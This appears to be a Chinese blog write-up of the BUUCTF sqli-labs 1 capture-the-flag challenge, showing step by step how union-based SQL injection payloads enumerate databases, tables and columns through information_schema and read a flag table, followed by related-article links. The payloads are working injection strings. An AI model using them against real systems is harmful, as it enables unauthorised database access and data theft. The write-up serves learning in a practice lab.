BUUCTF sqli-labs 1

这里就是单纯的找一下flag在哪,通关整个靶场在sql注入分区,虽然还没有通关。

这里要先看一下数据库都有哪些,用到语句:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

发现这个数据库:ctftraining 可能有我们需要的信息

于是接着就是:

查看该数据库中都有什么表:?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),3--+

发现存在flag表,接着就是要看该表的信息:?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'),3--+

发现就只有一列,然后就是查看该列的信息:

这里需要注意,我们要指定是ctftraining数据库的flag表,如果单纯的是flag则是查找的security.flag这时就会报错。

正确语句:?id=-1' union select 1,(select group_concat(flag) from ctftraining.flag),3--+

相关推荐
有代理ip11 小时前
网络隐私防护指南:代理服务与换 IP 工具的科学结合
网络·tcp/ip·web安全
雷工笔记15 小时前
SQL语句解析:DESC LIMIT 1
数据库·sql
lzhdim16 小时前
SQL 入门 10:SQL 内置函数:数值、字符串与时间处理
前端·数据库·sql
a11177616 小时前
网络安全检查表 docx 附文件
网络·安全·web安全
隐于花海,等待花开17 小时前
为什么要避免 SELECT *
sql
m0_738120721 天前
渗透测试基础ctfshow——Web应用安全与防护(四)
前端·安全·web安全·网络安全·flask·弱口令爆破
格鸰爱童话1 天前
跟着AI学sql
数据库·sql
买大橘子也用券1 天前
BUUCTF-[0CTF 2016]piapiapia-WP
web安全·网络安全
数厘1 天前
2.13 sql数据更新(UPDATE)
数据库·sql·oracle
买大橘子也用券1 天前
one_line_php-wp
web安全·网络安全·php